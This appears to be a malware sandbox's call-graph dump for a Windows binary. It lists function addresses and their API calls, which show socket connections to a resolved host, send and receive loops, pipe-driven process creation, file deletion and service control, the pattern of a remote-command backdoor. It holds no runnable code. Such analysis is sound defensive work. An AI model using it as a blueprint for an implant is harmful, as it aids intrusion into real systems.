8 API calls 10301->10306 10307 14d3e3 CloseHandle 10301->10307 10308 154290 8 API calls 10301->10308 10309 14d294 CloseHandle 10301->10309 10303 16fcc0 ReleaseMutex 10302->10303 10304 14d410 10303->10304 10304->9963 10305->10301 10306->10301 10307->10302 10308->10301 10311 16fcc0 ReleaseMutex 10309->10311 10312 14d322 10311->10312 10312->9963 10313->9993 10315 151115 10314->10315 10316 151126 10314->10316 10315->10017 10317 151137 10316->10317 10318 15114e WriteFile 10316->10318 10317->10017 10318->10017 10320 1753d4 10319->10320 10320->10020 10366 14a830 10369 15b720 10366->10369 10368 14a83f 10370 15b72e 10369->10370 10373 14d500 lstrlen 10370->10373 10372 15b739 10372->10368 10373->10372 11000 174eb3 11001 174ec5 11000->11001 11003 147a04 132 API calls 11001->11003 11002 174ec9 11003->11002 11185 141130 11186 14114b 11185->11186 11187 164420 8 API calls 11186->11187 11188 14115b 11187->11188 11189 14f330 11192 14d500 lstrlen 11189->11192 11191 14f38f 11192->11191 11193 14fb30 11194 152df0 8 API calls 11193->11194 11195 14fb55 11194->11195 11004 157eb0 11005 157ec0 11004->11005 11006 157eba 11004->11006 11007 152eb0 2 API calls 11006->11007 11007->11005 11008 15a0a6 11016 15a0b0 11008->11016 11009 156810 8 API calls 11009->11016 11010 15a5a1 11014 151bb0 2 API calls 11010->11014 11011 156810 8 API calls 11013 15a428 11011->11013 11012 141ca0 9 API calls 11012->11013 11013->11010 11013->11011 11013->11012 11017 15a606 11014->11017 11015 141ca0 9 API calls 11015->11016 11016->11009 11016->11013 11016->11015 11204 14ab27 11207 14ab30 11204->11207 11205 14acfe 11206 163a80 4 API calls 11206->11207 11207->11205 11207->11206 11208 143520 11209 14353f 11208->11209 11210 1568d0 4 API calls 11209->11210 11211 14355e 11209->11211 11210->11211 11258 15c9a0 11259 15c9be 11258->11259 11264 14d500 lstrlen 11259->11264 11261 15c9fd 11265 14df70 11261->11265 11264->11261 11268 160b70 11265->11268 11267 14df8a 11269 160baf 11268->11269 11270 160c9b 11269->11270 11272 160ca8 11269->11272 11271 1566f0 8 API calls 11270->11271 11274 160ca6 11271->11274 11273 14e320 8 API calls 11272->11273 11272->11274 11273->11274 11274->11267 11018 1622a0 11019 1622fb 11018->11019 11020 1750e0 3 API calls 11019->11020 11021 16247d 11020->11021 11022 169580 10 API calls 11021->11022 11023 1624c2 11022->11023 11024 14e430 lstrlen 11023->11024 11025 1624e6 11024->11025 11026 142f90 2 API calls 11025->11026 11027 162511 11026->11027 11028 151bb0 2 API calls 11027->11028 11035 162561 11028->11035 11029 151200 12 API calls 11029->11035 11030 15d990 8 API calls 11031 162bec Sleep 11030->11031 11047 158cf0 11031->11047 11033 152120 5 API calls 11033->11035 11034 1708b0 GetSystemTimeAsFileTime 11034->11035 11035->11029 11035->11030 11035->11033 11035->11034 11036 16fa80 3 API calls 11035->11036 11037 164af0 4 API calls 11035->11037 11038 160d80 22 API calls 11035->11038 11039 151bb0 GetProcessHeap RtlFreeHeap 11035->11039 11040 14d760 51 API calls 11035->11040 11041 14d530 9 API calls 11035->11041 11042 152c30 8 API calls 11035->11042 11043 15c770 8 API calls 11035->11043 11044 171050 8 API calls 11035->11044 11045 142f90 GetProcessHeap RtlAllocateHeap 11035->11045 11046 15d0f0 31 API calls 11035->11046 11036->11035 11037->11035 11038->11035 11039->11035 11040->11035 11041->11035 11042->11035 11043->11035 11044->11035 11045->11035 11046->11035 11049 158d16 11047->11049 11048 158f44 11048->11035 11049->11048 11050 158dca DeleteFileA 11049->11050 11052 158ee8 11049->11052 11054 141c30 11049->11054 11050->11049 11052->11048 11059 157d40 11052->11059 11063 14f270 11054->11063 11056 141c6a 11067 15d720 11056->11067 11060 157d69 11059->11060 11062 157e27 11060->11062 11074 14bba0 11060->11074 11062->11052 11064 14f29a 11063->11064 11065 150110 8 API calls 11064->11065 11066 14f2a2 11065->11066 11066->11056 11068 15d72e 11067->11068 11069 141c70 11068->11069 11071 152a80 11068->11071 11069->11049 11072 14e100 8 API calls 11071->11072 11073 152a8f 11072->11073 11073->11069 11077 1630b0 11074->11077 11078 1630e4 11077->11078 11079 1566f0 8 API calls 11078->11079 11080 14bbae 11079->11080 11080->11062 10321 1645a9 10322 1645bd 10321->10322 10327 160610 10322->10327 10326 1645ee 10328 16062b 10327->10328 10334 14b690 10328->10334 10330 160660 10331 16fde0 10330->10331 10332 16fdf7 10331->10332 10333 16fe12 GetStdHandle GetStdHandle GetStdHandle 10331->10333 10332->10333 10333->10326 10335 14b6b6 GetProcessHeap HeapAlloc 10334->10335 10335->10330 11212 174f57 11213 174ec5 11212->11213 11213->11212 11214 174f77 11213->11214 11216 147a04 132 API calls 11213->11216 11215 174ec9 11216->11215 11081 15fcd7 11094 15f850 11081->11094 11082 168b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11082->11094 11083 141170 2 API calls 11084 160425 11083->11084 11085 158bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11085->11094 11086 16ab60 4 API calls 11086->11094 11087 152c90 4 API calls 11087->11094 11088 16024a 11090 152c90 4 API calls 11088->11090 11091 160299 11088->11091 11089 171190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11089->11094 11090->11091 11093 152c90 4 API calls 11091->11093 11095 160368 11091->11095 11092 160790 4 API calls 11092->11094 11093->11095 11094->11082 11094->11085 11094->11086 11094->11087 11094->11088 11094->11089 11094->11092 11094->11095 11095->11083 11096 142cd0 11101 151cc0 11096->11101 11108 16b450 11101->11108 11109 16b46a 11108->11109 11110 1700f0 8 API calls 11109->11110 11111 16b49b 11110->11111 11112 1428d0 11113 1428e7 11112->11113 11115 142903 11112->11115 11114 142935 11115->11114 11116 142a46 ReadFile 11115->11116 11117 142a61 11116->11117 11118 14fed0 11119 14feeb 11118->11119 11120 14bb70 8 API calls 11119->11120 11121 14ff10 11120->11121 11124 163080 11121->11124 11125 16308e 11124->11125 11126 154290 8 API calls 11125->11126 11127 14ff27 11126->11127 11275 14f9d0 11276 14f9e6 11275->11276 11279 163c50 11276->11279 11278 14fa49 11280 163c6f 11279->11280 11281 14e320 8 API calls 11280->11281 11282 163c86 11281->11282 11282->11278 11128 160ad0 11131 14b780 11128->11131 11134 15d750 11131->11134 11135 15d77e 11134->11135 11136 15d75a 11134->11136 11137 152eb0 2 API calls 11136->11137 11137->11135 11283 160fd8 11285 160fe0 11283->11285 11381 14d500 lstrlen 11285->11381 11286 16110c 11382 14d500 lstrlen 11286->11382 11288 162250 11289 16111a 11289->11288 11290 142f90 2 API calls 11289->11290 11291 161195 11290->11291 11292 14d530 9 API calls 11291->11292 11293 1611c3 11292->11293 11294 151bb0 2 API calls 11293->11294 11295 1611d5 11294->11295 11297 142f90 2 API calls 11295->11297 11324 16134c 11295->11324 11296 1701a0 9 API calls 11298 1613d8 11296->11298 11299 161226 11297->11299 11300 171050 8 API calls 11298->11300 11302 15a810 9 API calls 11299->11302 11301 1613e4 11300->11301 11303 142f90 2 API calls 11301->11303 11305 161258 11302->11305 11304 161422 11303->11304 11306 1701a0 9 API calls 11304->11306 11307 151bb0 2 API calls 11305->11307 11308 16144a 11306->11308 11311 161288 11307->11311 11309 171050 8 API calls 11308->11309 11310 161456 11309->11310 11313 151bb0 2 API calls 11310->11313 11312 16b500 8 API calls 11311->11312 11311->11324 11315 1612fa 11312->11315 11314 161478 11313->11314 11318 1701a0 9 API calls 11314->11318 11316 142f90 2 API calls 11315->11316 11317 161310 11316->11317 11319 14d530 9 API calls 11317->11319 11320 1614e2 11318->11320 11321 161328 11319->11321 11322 171050 8 API calls 11320->11322 11323 151bb0 2 API calls 11321->11323 11325 1614f1 11322->11325 11323->11324 11324->11296 11329 142f90 2 API calls 11325->11329 11364 1616c2 11325->11364 11326 142f90 2 API calls 11327 161702 11326->11327 11328 1701a0 9 API calls 11327->11328 11331 161728 11328->11331 11330 161595 11329->11330 11332 1701a0 9 API calls 11330->11332 11333 171050 8 API calls 11331->11333 11334 1615d0 11332->11334 11335 161734 11333->11335 11336 171050 8 API calls 11334->11336 11338 151bb0 2 API calls 11335->11338 11337 1615df 11336->11337 11341 142f90 2 API calls 11337->11341 11339 16174e 11338->11339 11340 161786 socket 11339->11340 11342 171050 8 API calls 11339->11342 11343 1617b2 11340->11343 11344 1617de 11340->11344 11345 161600 11341->11345 11342->11340 11346 1618c4 gethostbyname 11344->11346 11347 1617fb setsockopt 11344->11347 11348 151bb0 2 API calls 11345->11348 11346->11288 11351 1618ed inet_ntoa inet_addr htons connect 11346->11351 11349 161866 11347->11349 11350 161628 11348->11350 11349->11346 11354 175820 wvsprintfA 11350->11354 11353 1619ca 11351->11353 11356 1619e0 11351->11356 11355 16165e 11354->11355 11357 151bb0 2 API calls 11355->11357 11359 161a00 send 11356->11359 11358 16167a 11357->11358 11360 1701a0 9 API calls 11358->11360 11363 161a1e 11359->11363 11361 1616b3 11360->11361 11362 171050 8 API calls 11361->11362 11362->11364 11365 15d990 8 API calls 11363->11365 11367 161a3e 11363->11367 11364->11326 11366 161add recv 11365->11366 11368 1621ad closesocket 11366->11368 11379 161b57 11366->11379 11370 162210 11368->11370 11369 141df0 GetSystemTimeAsFileTime 11369->11379 11370->11288 11371 16b500 8 API calls 11370->11371 11371->11288 11372 150110 8 API calls 11372->11379 11373 154290 8 API calls 11373->11379 11374 162135 recv 11375 162187 11374->11375 11374->11379 11375->11368 11376 14c110 9 API calls 11376->11379 11377 142f90 GetProcessHeap RtlAllocateHeap 11377->11379 11378 15a810 9 API calls 11378->11379 11379->11368 11379->11369 11379->11372 11379->11373 11379->11374 11379->11375 11379->11376 11379->11377 11379->11378 11380 151bb0 GetProcessHeap RtlFreeHeap 11379->11380 11380->11379 11381->11286 11382->11289 11383 14a5c0 11384 15d990 8 API calls 11383->11384 11385 14a600 11384->11385 11390 142b40 11385->11390 11387 14a61d 11388 15d990 8 API calls 11387->11388 11389 14a6ac 11388->11389 11391 142b51 11390->11391 11392 164420 8 API calls 11391->11392 11393 142b61 11392->11393 11393->11387 10378 15ca40 10379 15ca62 10378->10379 10434 1649b0 10379->10434 10381 15cb32 10384 15d03e 10381->10384 10438 164af0 10381->10438 10385 142f90 2 API calls 10386 15cc2c 10385->10386 10387 14d530 9 API calls 10386->10387 10388 15cc44 10387->10388 10389 151bb0 2 API calls 10388->10389 10390 15cc6b 10389->10390 10450 142f00 10390->10450 10395 171050 8 API calls 10396 15cccb 10395->10396 10397 142f90 2 API calls 10396->10397 10398 15ccf4 10397->10398 10399 1701a0 9 API calls 10398->10399 10400 15cd19 10399->10400 10401 171050 8 API calls 10400->10401 10402 15cd25 10401->10402 10403 151bb0 2 API calls 10402->10403 10404 15cd47 10403->10404 10456 15c770 10404->10456 10406 15cd7b 10407 171050 8 API calls 10406->10407 10408 15cd84 10407->10408 10409 16b500 8 API calls 10408->10409 10410 15cdb4 10409->10410 10460 14e550 10410->10460 10412 15cde5 10413 1597b0 9 API calls 10412->10413 10414 15ce25 10413->10414 10518 15bf40 10414->10518 10417 142f90 2 API calls 10418 15ce9c 10417->10418 10419 1701a0 9 API calls 10418->10419 10420 15cec2 10419->10420 10421 171050 8 API calls 10420->10421 10422 15cece 10421->10422 10423 151bb0 2 API calls 10422->10423 10424 15cf08 10423->10424 10425 154290 8 API calls 10424->10425 10426 15cf34 10425->10426 10427 15d990 8 API calls 10426->10427 10428 15cfb2 10427->10428 10429 142f90 2 API calls 10428->10429 10430 15cfd0 10429->10430 10522 160d80 10430->10522 10432 15d029 10433 151bb0 2 API calls 10432->10433 10433->10384 10435 154290 8 API calls 10434->10435 10437 1649e4 SetEvent 10435->10437 10437->10381 10439 164b32 10438->10439 10440 142f90 2 API calls 10439->10440 10441 164b55 10440->10441 10442 142f90 2 API calls 10441->10442 10443 164b78 10442->10443 10625 1571e0 10443->10625 10445 164b93 10446 151bb0 2 API calls 10445->10446 10447 164bb0 10446->10447 10448 151bb0 2 API calls 10447->10448 10449 15cc06 10448->10449 10449->10385 10631 1508d0 10450->10631 10452 142f17 10453 164df0 10452->10453 10643 14e100 10453->10643 10455 15ccbf 10455->10395 10457 15c79b 10456->10457 10458 154290 8 API calls 10457->10458 10459 15c86a 10457->10459 10458->10459 10459->10406 10461 14e5ad 10460->10461 10462 142f90 2 API calls 10461->10462 10467 14e6cb 10461->10467 10463 14e689 10462->10463 10464 14d530 9 API calls 10463->10464 10465 14e6a0 10464->10465 10466 151bb0 2 API calls 10465->10466 10466->10467 10468 14e7e1 10467->10468 10469 14e77f 10467->10469 10472 142f90 2 API calls 10468->10472 10470 142f90 2 API calls 10469->10470 10471 14e795 10470->10471 10473 14d530 9 API calls 10471->10473 10474 14e819 10472->10474 10475 14e7ac 10473->10475 10651 16f500 10474->10651 10476 151bb0 2 API calls 10475->10476 10477 14e7c5 10476->10477 10477->10412 10480 151bb0 2 API calls 10481 14e893 10480->10481 10482 14e8bf 10481->10482 10483 14e9a8 10481->10483 10485 142f90 2 API calls 10482->10485 10663 15d820 10483->10663 10487 14e924 10485->10487 10493 14d530 9 API calls 10487->10493 10488 14e9d6 10491 142f90 2 API calls 10488->10491 10489 14ea7f 10490 1648d0 lstrlen 10489->10490 10496 14eac3 10490->10496 10492 14e9fb 10491->10492 10494 14d530 9 API calls 10492->10494 10495 14e96c 10493->10495 10497 14ea36 10494->10497 10498 151bb0 2 API calls 10495->10498 10667 14ff90 10496->10667 10500 151bb0 2 API calls 10497->10500 10501 14e994 10498->10501 10503 14ea49 10500->10503 10501->10412 10503->10412 10506 142f90 2 API calls 10507 14eb9a 10506->10507 10508 151bb0 2 API calls 10507->10508 10509 14ebe8 10508->10509 10675 14d500 lstrlen 10509->10675 10511 14ec14 10512 151d90 5 API calls 10511->10512 10513 14ec47 10512->10513 10676 158200 10513->10676 10517 14ed7c 10517->10412 10519 15bf63 10518->10519 10520 164420 8 API calls 10519->10520 10521 15bf73 10520->10521 10521->10417 10523 160d9a 10522->10523 10524 1708b0 GetSystemTimeAsFileTime 10523->10524 10525 160f04 10524->10525 10918 14d500 lstrlen 10525->10918 10527 160f89 10527->10432 10529 16110c 10920 14d500 lstrlen 10529->10920 10531 160f6d 10531->10527 10919 14d500 lstrlen 10531->10919 10532 162250 10532->10432 10533 16111a 10533->10532 10534 142f90 2 API calls 10533->10534 10535 161195 10534->10535 10536 14d530 9 API calls 10535->10536 10537 1611c3 10536->10537 10538 151bb0 2 API calls 10537->10538 10539 1611d5 10538->10539 10541 142f90 2 API calls 10539->10541 10568 16134c 10539->10568 10540 1701a0 9 API calls 10542 1613d8 10540->10542 10543 161226 10541->10543 10544 171050 8 API calls 10542->10544 10546 15a810 9 API calls 10543->10546 10545 1613e4 10544->10545 10547 142f90 2 API calls 10545->10547 10549 161258 10546->10549 10548 161422 10547->10548 10550 1701a0 9 API calls 10548->10550 10551 151bb0 2 API calls 10549->10551 10552 16144a 10550->10552 10555 161288 10551->10555 10553 171050 8 API calls 10552->10553 10554 161456 10553->10554 10557 151bb0 2 API calls 10554->10557 10556 16b500 8 API calls 10555->10556 10555->10568 10559 1612fa 10556->10559 10558 161478 10557->10558 10562 1701a0 9 API calls 10558->10562 10560 142f90 2 API calls 10559->10560 10561 161310 10560->10561 10563 14d530 9 API calls 10561->10563 10564 1614e2 10562->10564 10565 161328 10563->10565 10566 171050 8 API calls 10564->10566 10567 151bb0 2 API calls 10565->10567 10569 1614f1 10566->10569 10567->10568 10568->10540 10573 142f90 2 API calls 10569->10573 10608 1616c2 10569->10608 10570 142f90 2 API calls 10571 161702 10570->10571 10572 1701a0 9 API calls 10571->10572 10575 161728 10572->10575 10574 161595 10573->10574 10576 1701a0 9 API calls 10574->10576 10577 171050 8 API calls 10575->10577 10578 1615d0 10576->10578 10579 161734 10577->10579 10580 171050 8 API calls 10578->10580 10582 151bb0 2 API calls 10579->10582 10581 1615df 10580->10581 10585 142f90 2 API calls 10581->10585 10583 16174e 10582->10583 10584 161786 socket 10583->10584 10586 171050 8 API calls 10583->10586 10587 1617b2 10584->10587 10588 1617de 10584->10588 10589 161600 10585->10589 10586->10584 10587->10432 10590 1618c4 gethostbyname 10588->10590 10591 1617fb setsockopt 10588->10591 10592 151bb0 2 API calls 10589->10592 10590->10532 10595 1618ed inet_ntoa inet_addr htons connect 10590->10595 10593 161866 10591->10593 10594 161628 10592->10594 10593->10590 10598 175820 wvsprintfA 10594->10598 10597 1619ca 10595->10597 10600 1619e0 10595->10600 10597->10432 10599 16165e 10598->10599 10601 151bb0 2 API calls 10599->10601 10603 161a00 send 10600->10603 10602 16167a 10601->10602 10604 1701a0 9 API calls 10602->10604 10607 161a1e 10603->10607 10605 1616b3 10604->10605 10606 171050 8 API calls 10605->10606 10606->10608 10609 15d990 8 API calls 10607->10609 10611 161a3e 10607->10611 10608->10570 10610 161add recv 10609->10610 10612 1621ad closesocket 10610->10612 10624 161b57 10610->10624 10611->10432 10614 162210 10612->10614 10614->10532 10615 16b500 8 API calls 10614->10615 10615->10532 10616 150110 8 API calls 10616->10624 10617 154290 8 API calls 10617->10624 10618 142f90 GetProcessHeap RtlAllocateHeap 10618->10624 10619 162135 recv 10620 162187 10619->10620 10619->10624 10620->10612 10621 151bb0 GetProcessHeap RtlFreeHeap 10621->10624 10623 15a810 9 API calls 10623->10624 10624->10612 10624->10616 10624->10617 10624->10618 10624->10619 10624->10620 10624->10621 10624->10623 10921 141df0 10624->10921 10925 14c110 10624->10925 10626 157202 10625->10626 10627 142f90 2 API calls 10626->10627 10628 157648 10627->10628 10629 151bb0 2 API calls 10628->10629 10630 157684 10629->10630 10630->10445 10632 1508db 10631->10632 10635 157ed0 10632->10635 10636 157eec 10635->10636 10639 164420 10636->10639 10640 164434 10639->10640 10641 152df0 8 API calls 10640->10641 10642 1508fe 10641->10642 10642->10452 10644 14e111 10643->10644 10647 141000 10644->10647 10646 14e127 10646->10455 10648 14100b 10647->10648 10649 163f00 8 API calls 10648->10649 10650 141068 10649->10650 10650->10646 10652 16f5be 10651->10652 10661 14e83f 10652->10661 10700 1421f0 10652->10700 10656 16f77d 10657 16f6bd 10656->10657 10710 15dcf0 10656->10710 10730 142f20 10657->10730 10660 16f882 10718 170220 10660->10718 10661->10480 10664 15d83c GetModuleFileNameA 10663->10664 10666 14e9cb 10664->10666 10666->10488 10666->10489 10668 14ffcb 10667->10668 10669 150920 8 API calls 10668->10669 10670 14eaeb 10668->10670 10669->10670 10671 157ff0 10670->10671 10674 158035 10671->10674 10672 14eb0c 10672->10506 10673 14ff90 8 API calls 10673->10674 10674->10672 10674->10673 10675->10511 10677 15823e 10676->10677 10678 158465 CreatePipe 10677->10678 10679 158499 SetHandleInformation CreatePipe 10678->10679 10680 15848a 10678->10680 10683 1585cd SetHandleInformation 10679->10683 10684 15858a 10679->10684 10682 15d990 8 API calls 10680->10682 10685 14ed18 DeleteFileA 10680->10685 10682->10685 10688 15860f 10683->10688 10686 1587e3 CloseHandle 10684->10686 10685->10517 10686->10680 10687 1587fd CloseHandle 10686->10687 10687->10680 10689 158719 CreateProcessA 10688->10689 10690 158777 10689->10690 10691 15885c WriteFile 10690->10691 10692 158789 CloseHandle CloseHandle 10690->10692 10691->10692 10693 1588dd CloseHandle CloseHandle 10691->10693 10692->10686 10695 15893e 10693->10695 10910 1423a0 10695->10910 10698 1589e6 CloseHandle CloseHandle 10699 1589b2 10699->10698 10701 14221e 10700->10701 10733 163a80 10701->10733 10704 168b60 4 API calls 10705 1422d1 10704->10705 10705->10657 10706 168b60 10705->10706 10707 168b95 10706->10707 10708 163a80 4 API calls 10707->10708 10709 168be0 10708->10709 10709->10656 10711 15dd26 10710->10711 10739 14bfa0 10711->10739 10715 15dd68 10751 170a90 10715->10751 10717 15dd93 10717->10660 10719 17022d 10718->10719 10721 1703d0 10719->10721 10763 14c6b0 10719->10763 10721->10657 10722 170369 10722->10721 10724 142f90 2 API calls 10722->10724 10728 170613 10722->10728 10723 142f90 2 API calls 10729 1705e4 10723->10729 10726 1705c8 10724->10726 10725 170713 10725->10657 10727 151bb0 2 API calls 10726->10727 10726->10729 10727->10728 10728->10723 10728->10725 10729->10657 10731 141170 2 API calls 10730->10731 10732 142f63 10731->10732 10732->10661 10734 163ab7 10733->10734 10736 1422ae 10733->10736 10735 14e2c0 2 API calls 10734->10735 10737 163ade 10735->10737 10736->10704 10736->10705 10737->10736 10738 152eb0 2 API calls 10737->10738 10738->10736 10740 14c008 10739->10740 10741 142f90 2 API calls 10740->10741 10742 14c048 10741->10742 10743 151bb0 2 API calls 10742->10743 10744 14c072 10743->10744 10745 154db0 10744->10745 10746 1550de 10745->10746 10747 154dfc 10745->10747 10746->10715 10748 154f9c 10747->10748 10757 164ea0 10747->10757 10748->10746 10750 164ea0 4 API calls 10748->10750 10750->10748 10752 170ab6 10751->10752 10753 154db0 4 API calls 10752->10753 10754 170dd8 10753->10754 10755 154db0 4 API calls 10754->10755 10756 170e55 10755->10756 10756->10717 10758 164f16 10757->10758 10759 142f90 2 API calls 10758->10759 10760 165042 10759->10760 10761 151bb0 2 API calls 10760->10761 10762 1653e8 10761->10762 10762->10748 10764 14c6f6 10763->10764 10765 1421f0 4 API calls 10764->10765 10768 14c722 10765->10768 10766 141170 2 API calls 10767 14c8d2 10766->10767 10767->10722 10769 14c74d 10768->10769 10772 14c79a 10768->10772 10774 14c813 10768->10774 10775 141170 10769->10775 10779 1530f0 10772->10779 10774->10766 10776 14119e 10775->10776 10777 152eb0 2 API calls 10776->10777 10778 141396 10776->10778 10777->10776 10778->10722 10781 15313f 10779->10781 10780 1540b3 10780->10774 10781->10780 10782 163a80 4 API calls 10781->10782 10783 15338d 10782->10783 10785 163a80 4 API calls 10783->10785 10792 153959 10783->10792 10784 154009 10786 15403e 10784->10786 10787 15404a 10784->10787 10789 1533ef 10785->10789 10790 141170 2 API calls 10786->10790 10791 141170 2 API calls 10787->10791 10788 141170 2 API calls 10788->10792 10789->10792 10793 163a80 4 API calls 10789->10793 10795 154045 10790->10795 10791->10795 10792->10784 10792->10788 10794 15343c 10793->10794 10794->10792 10796 168b60 4 API calls 10794->10796 10805 153469 10794->10805 10795->10774 10797 15349c 10796->10797 10797->10792 10815 171190 10797->10815 10799 1535d4 10801 14ad30 4 API calls 10799->10801 10800 1535e7 10827 152c90 10800->10827 10806 1535e2 10801->10806 10805->10792 10805->10799 10805->10800 10807 152c90 4 API calls 10806->10807 10808 15363c 10807->10808 10808->10792 10809 163a80 4 API calls 10808->10809 10810 153750 10809->10810 10810->10792 10811 152c90 4 API calls 10810->10811 10813 153813 10811->10813 10812 163a80 4 API calls 10812->10813 10813->10792 10813->10812 10814 152c90 4 API calls 10813->10814 10814->10813 10816 1711d8 10815->10816 10817 163a80 4 API calls 10816->10817 10818 1534da 10816->10818 10817->10818 10818->10792 10819 14ad30 10818->10819 10820 14ad45 10819->10820 10832 15f160 10820->10832 10822 14ae1f 10822->10805 10824 14ad8b 10824->10822 10826 14ade7 10824->10826 10874 160790 10824->10874 10826->10822 10883 16ab60 10826->10883 10828 152cb9 10827->10828 10829 152ce0 10828->10829 10830 163a80 4 API calls 10828->10830 10829->10806 10831 152d76 10830->10831 10831->10806 10834 15f1b5 10832->10834 10833 15f1bc 10833->10824 10834->10833 10835 15f322 10834->10835 10836 15f27a 10834->10836 10839 152c90 4 API calls 10835->10839 10837 15f2bb 10836->10837 10840 168b60 4 API calls 10836->10840 10838 15f2f8 10837->10838 10841 152c90 4 API calls 10837->10841 10866 15f2eb 10837->10866 10838->10824 10842 15f392 10839->10842 10840->10837 10841->10866 10843 152c90 4 API calls 10842->10843 10842->10866 10845 15f3d9 10843->10845 10844 141170 2 API calls 10846 160425 10844->10846 10847 163a80 4 API calls 10845->10847 10845->10866 10846->10824 10848 15f440 10847->10848 10849 168b60 4 API calls 10848->10849 10848->10866 10850 15f461 10849->10850 10851 163a80 4 API calls 10850->10851 10850->10866 10852 15f485 10851->10852 10853 163a80 4 API calls 10852->10853 10852->10866 10854 15f4a7 10853->10854 10855 171190 4 API calls 10854->10855 10856 15f5fa 10854->10856 10854->10866 10857 15f5a0 10855->10857 10858 171190 4 API calls 10856->10858 10856->10866 10859 171190 4 API calls 10857->10859 10857->10866 10862 15f6df 10858->10862 10859->10856 10860 16ab60 4 API calls 10860->10862 10861 16024a 10863 152c90 4 API calls 10861->10863 10864 160299 10861->10864 10862->10860 10868 15f7e0 10862->10868 10863->10864 10865 152c90 4 API calls 10864->10865 10864->10866 10865->10866 10866->10838 10866->10844 10867 168b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10867->10868 10868->10861 10868->10866 10868->10867 10869 158bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10868->10869 10870 16ab60 4 API calls 10868->10870 10871 152c90 4 API calls 10868->10871 10872 171190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10868->10872 10873 160790 4 API calls 10868->10873 10869->10868 10870->10868 10871->10868 10872->10868 10873->10868 10875 160a0d 10874->10875 10876 1607cb 10874->10876 10902 14a850 10875->10902 10878 160926 10876->10878 10879 1607e5 10876->10879 10880 15d9a0 4 API calls 10878->10880 10893 15d9a0 10879->10893 10882 160882 10880->10882 10882->10824 10884 16ab77 10883->10884 10885 16ad05 10884->10885 10886 16abea 10884->10886 10887 14a850 4 API calls 10885->10887 10888 16ac6c 10886->10888 10889 16ac0c 10886->10889 10892 16ac21 10887->10892 10890 15d9a0 4 API calls 10888->10890 10891 15d9a0 4 API calls 10889->10891 10890->10892 10891->10892 10892->10826 10896 15d9c5 10893->10896 10894 15da26 10894->10882 10895 15dadb 10897 152c90 4 API calls 10895->10897 10899 15db90 10895->10899 10896->10894 10896->10895 10898 152c90 4 API calls 10896->10898 10897->10899 10898->10895 10900 141170 2 API calls 10899->10900 10901 15dc9f 10900->10901 10901->10882 10903 14a8dc 10902->10903 10904 14aa1a 10903->10904 10905 152c90 4 API calls 10903->10905 10906 163a80 4 API calls 10904->10906 10907 14acfe 10904->10907 10905->10904 10909 14aa81 10906->10909 10907->10882 10908 163a80 4 API calls 10908->10909 10909->10907 10909->10908 10911 1423ad 10910->10911 10912 15d990 8 API calls 10911->10912 10913 1423f2 ReadFile 10912->10913 10914 1424c1 WaitForSingleObject 10913->10914 10915 142452 10913->10915 10914->10698 10914->10699 10915->10914 10916 154290 8 API calls 10915->10916 10917 14247e ReadFile 10916->10917 10917->10914 10917->10915 10918->10531 10919->10529 10920->10533 10922 141e0f 10921->10922 10924 141e37 10921->10924 10923 1708b0 GetSystemTimeAsFileTime 10922->10923 10923->10924 10924->10624 10926 14c152 10925->10926 10927 142f90 2 API calls 10926->10927 10928 14c193 10927->10928 10929 15a810 9 API calls 10928->10929 10930 14c1d1 10929->10930 10931 151bb0 2 API calls 10930->10931 10932 14c205 10931->10932 10933 14c218 10932->10933 10934 142f90 2 API calls 10932->10934 10933->10624 10935 14c245 10934->10935 10936 15a810 9 API calls 10935->10936 10937 14c29b 10936->10937 10938 151bb0 2 API calls 10937->10938 10939 14c2f8 10938->10939 10939->10624 11138 15a6c0 11139 15a6d7 11138->11139 11140 164450 12 API calls 11139->11140 11141 15a71c 11140->11141 11142 154290 8 API calls 11141->11142 11143 15a7ea 11142->11143 11394 16b3c0 11395 152a80 8 API calls 11394->11395 11396 16b3d9 11395->11396 11397 171050 8 API calls 11396->11397 11398 16b42e 11397->11398 10940 153874 10949 153880 10940->10949 10941 163a80 4 API calls 10941->10949 10942 154009 10943 15403e 10942->10943 10944 15404a 10942->10944 10947 141170 2 API calls 10943->10947 10948 141170 2 API calls 10944->10948 10945 141170 2 API calls 10951 153959 10945->10951 10946 152c90 4 API calls 10946->10949 10950 154045 10947->10950 10948->10950 10949->10941 10949->10946 10949->10951 10951->10942 10951->10945 11399 156ff0 11400 15700d 11399->11400 11409 14d500 lstrlen 11400->11409 11402 157083 11403 150110 8 API calls 11402->11403 11404 157099 11403->11404 11405 141ca0 9 API calls 11404->11405 11406 1570ac 11405->11406 11407 163080 8 API calls 11406->11407 11408 1570d0 11407->11408 11409->11402 10956 166a7b 10957 166a8c 10956->10957 10958 167846 10957->10958 10959 1677c2 10957->10959 10973 165706 10957->10973 10961 167852 10958->10961 10962 16793b 10958->10962 10960 175820 wvsprintfA 10959->10960 10960->10973 10964 1678c5 10961->10964 10966 16786e 10961->10966 10963 1679a8 10962->10963 10965 167957 10962->10965 10968 175820 wvsprintfA 10963->10968 10967 175820 wvsprintfA 10964->10967 10969 175820 wvsprintfA 10965->10969 10965->10973 10970 175820 wvsprintfA 10966->10970 10966->10973 10967->10973 10968->10973 10969->10973 10970->10973 10971 1686f1 10973->10971 10974 14d500 lstrlen 10973->10974 10974->10973 11217 142764 11218 142770 Sleep 11217->11218 11220 14279b 11218->11220 11219 1708b0 GetSystemTimeAsFileTime 11219->11220 11220->11218 11220->11219 11221 1427c8 11220->11221 11151 1666e7 11152 16679c 11151->11152 11156 165706 11152->11156 11158 14d500 lstrlen 11152->11158 11154 1686f1 11156->11154 11157 14d500 lstrlen 11156->11157 11157->11156 11158->11156 11159 1644e5 11160 1644f0 11159->11160 11161 150920 8 API calls 11160->11161 11162 16457d 11160->11162 11161->11160 10975 151860 10976 15187d 10975->10976 10977 15189b SetServiceStatus 10976->10977 10979 1518c1 10976->10979 10980 1518cb SetServiceStatus SetEvent 10976->10980 10979->10980 11425 1655e0 11426 165643 11425->11426 11429 165679 11425->11429 11427 1656c7 11429->11427 11430 14d500 lstrlen 11429->11430 11430->11429

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00147A04 Relevance: 60.1, APIs: 28, Strings: 5, Instructions: 2326sleepfilesynchronizationCOMMON
